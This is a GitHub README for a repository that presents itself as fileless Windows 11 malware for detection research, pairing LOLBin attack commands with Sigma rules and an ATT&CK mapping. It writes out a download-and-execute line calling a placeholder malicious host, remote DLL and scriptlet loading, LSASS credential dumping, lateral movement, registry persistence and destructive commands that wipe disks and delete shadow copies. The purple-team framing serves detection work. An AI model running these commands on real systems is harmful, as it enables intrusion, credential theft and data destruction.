https://github.com/P1rat3L00t/Blu3F1R3

Fileless PoC malware for educational & security research purposes.
https://github.com/P1rat3L00t/Blu3F1R3

anydesk blue-team bsod fileless-malware living-off-the-land log-analysis lolbins loldrivers mitre-attack purple-team ransom-note red-teaming reflective-dll registry-keys threat-detection windows-11

Last synced: 12 months ago
JSON representation

Fileless PoC malware for educational & security research purposes.

• Host: GitHub
• URL: https://github.com/P1rat3L00t/Blu3F1R3
• Owner: P1rat3L00t
• License: mit
• Created: 2025-06-19T00:58:45.000Z (12 months ago)
• Default Branch: main
• Last Pushed: 2025-06-21T20:29:54.000Z (12 months ago)
• Last Synced: 2025-06-21T20:33:19.994Z (12 months ago)
• Topics: anydesk, blue-team, bsod, fileless-malware, living-off-the-land, log-analysis, lolbins, loldrivers, mitre-attack, purple-team, ransom-note, red-teaming, reflective-dll, registry-keys, threat-detection, windows-11
• Language: C++
• Homepage: https://lolol.farm/
• Size: 563 KB
• Stars: 0
• Watchers: 0
• Forks: 0
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

          

# Windows 11 Threat Detection & Threat Intel via Sigma + MITRE ATT&CK + LOLBins

> **Warning**  

> This project is for **educational, authorized research, and blue team simulation in isolated lab environments only**.  

> **Do not test on production or unauthorized systems.  

> The authors are NOT responsible for misuse.**

---

![Threat Detection](https://github.com/user-attachments/assets/0360c1d6-32c1-416b-a93a-a02822d7a536)

---

## Table of Contents

- [About](#about)

- [Technical Overview](#technical-overview)

- [Attack Chain Example (PowerShell)](#attack-chain-example-powershell)

- [Reconnaissance and LOLBins](#reconnaissance-and-lolbins)

- [Advanced Techniques](#advanced-techniques)

- [MITRE ATT&CK + Sigma Mapping](#mitre-attck--sigma-mapping)

- [Destructive LOLBin Payloads](#destructive-lolbin-payloads)

- [Log-Based Detection Engineering](#log-based-detection-engineering)

- [Legal Disclaimer](#legal-disclaimer)

- [References & Further Reading](#references--further-reading)

---

## About

This lab-oriented simulation demonstrates fileless attack chains using LOLBins and post-exploitation techniques on **Windows 11**. It is built to aid:

- Blue teamers in building custom **Sigma detection rules**.

- Threat hunters studying MITRE ATT&CK tactics mapped to native Windows activity.

- Log analysts working with **Sysmon, Event Viewer, and EVTX files**.

---

## Technical Overview

The project mimics advanced attacker behavior using trusted Windows binaries and in-memory payload delivery. Coverage includes:

- **Initial Access & Execution:** Abuse of `rundll32`, `regsvr32`, `certutil`, etc.

- **Privilege Escalation:** Print Spooler CVEs, HiveNightmare, SeriousSAM.

- **Credential Access:** LSASS dump, SAM parsing.

- **Lateral Movement:** `wmic`, `PowerShell` remoting.

- **Destruction/Impact:** Payload encryption or wipe using only built-in tools.

These stages are aligned with **MITRE ATT&CK** and tailored for **log analysis via Sigma rules and Sysmon events**.

---

## Attack Chain Example (PowerShell)

A practical simulation using LOLBins and stealthy PowerShell:

```powershell

# Initial Access

IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Reflective DLL Injection

rundll32.exe \\192.168.X.X\share\payload.dll,ReflectEntry

# Privilege Escalation

Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Dumping

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement

wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# Persistence via Registry

Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Persistence" -Value "powershell -File C:\Temp\persist.ps1"

````

---

## Reconnaissance and LOLBins

### LOLBins (Living Off the Land Binaries)

These built-in binaries are abused for fileless execution:

```cmd

regsvr32 /s /n /u /i:http://evil/payload.sct scrobj.dll

certutil -urlcache -split -f http://evil/payload.b64 drop.exe

rundll32.exe \\192.168.X.X\share\payload.dll,ReflectEntry

```

Use Sigma to flag any suspicious use of these:

```yaml

detection:

  selection:

    Image|endswith: '\rundll32.exe'

    CommandLine|contains: '\\'

  condition: selection

```

---

## Advanced Techniques

### Fileless Embedding via Native Tools

```cmd

copy /b clean.jpg + malware.7z clean.jpg

certutil -decode clean.jpg payload.7z

7z x payload.7z -oC:\Temp\

```

### Reflective DLL Execution (In-Memory)

```cmd

rundll32.exe \\evilhost\malicious.dll,ReflectEntry

```

Track these behaviors via **Sysmon Event ID 1 + ID 7** and use Sigma rules to flag remote `.dll` execution or abnormal image loads.

---

## MITRE ATT\&CK + Sigma Mapping

| Tactic               | Technique                     | ATT\&CK ID       | Sigma Detection Focus                        |

| -------------------- | ----------------------------- | ---------------- | -------------------------------------------- |

| Initial Access       | Malicious Office/Payload Drop | T1203            | Office macros, outbound HTTP from MS Office  |

| Execution            | LOLBins & Scripting           | T1218, T1059     | regsvr32, rundll32, powershell, certutil     |

| Privilege Escalation | Print Spooler, Hive ACL       | T1068, T1003.002 | Spoolsv.exe anomalies, SAM/LSASS file access |

| Credential Access    | LSASS Dump, SAM Access        | T1003            | Access to lsass, use of comsvcs.dll          |

| Lateral Movement     | Remote Service Execution      | T1021.002        | wmic, psexec, and abnormal remote processes  |

| Impact               | File Encryption, VSS Deletion | T1486, T1490     | vssadmin, cipher.exe, shadow copy deletion   |

---

## Destructive LOLBin Payloads

Used in impact or ransomware simulation phases:

```cmd

cipher /w:C:\

vssadmin delete shadows /all /quiet

bcdedit /set {default} recoveryenabled No

forfiles /p C:\ /s /d -2 /c "cmd /c del /q @file"

```

Sigma Detection Example:

```yaml

detection:

  selection:

    CommandLine|contains: 'cipher /w'

  condition: selection

```

---

## Log-Based Detection Engineering

### Recommended Setup

* **Sysmon Configuration:** Use [SwiftOnSecurity's sysmon config](https://github.com/SwiftOnSecurity/sysmon-config)

* **Log Sources:**

  * Microsoft-Windows-Sysmon/Operational

  * Security.evtx

  * Windows PowerShell logs

  * WMI Activity logs

### Tools

* **Sigma:** Convert to Splunk/ELK with `sigmac`.

* **EvtxECmd or Chainsaw:** Parse `.evtx` offline for hunting.

* **RedCanary’s Atomic Red Team:** For validation testing.

### Key Sigma Triggers

| Event | Trigger Description                        |

| ----- | ------------------------------------------ |

| 1     | Process creation (e.g. rundll32, certutil) |

| 7     | Image loaded (non-Microsoft DLLs)          |

| 11    | File creation (e.g. lsass.dmp, .7z)        |

| 13    | Registry key modification for persistence  |

---

## Legal Disclaimer

> All tools, code, and techniques are shared purely for authorized learning and research.

> Use only in test environments and always adhere to ethical and legal standards.

> The authors **take no responsibility** for misuse.

---

## References & Further Reading

* [Sigma HQ](https://github.com/SigmaHQ/sigma)

* [LOLBas Project](https://lolbas-project.github.io/)

* [Sysmon](https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon)

* [MITRE ATT\&CK](https://attack.mitre.org/)

* [Chainsaw - Rapid Log Analysis](https://github.com/countercept/chainsaw)

* [EvtxECmd](https://ericzimmerman.github.io/)

* [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team)

* [Print Spooler Exploits](https://itm4n.github.io/printnightmare-not-over/)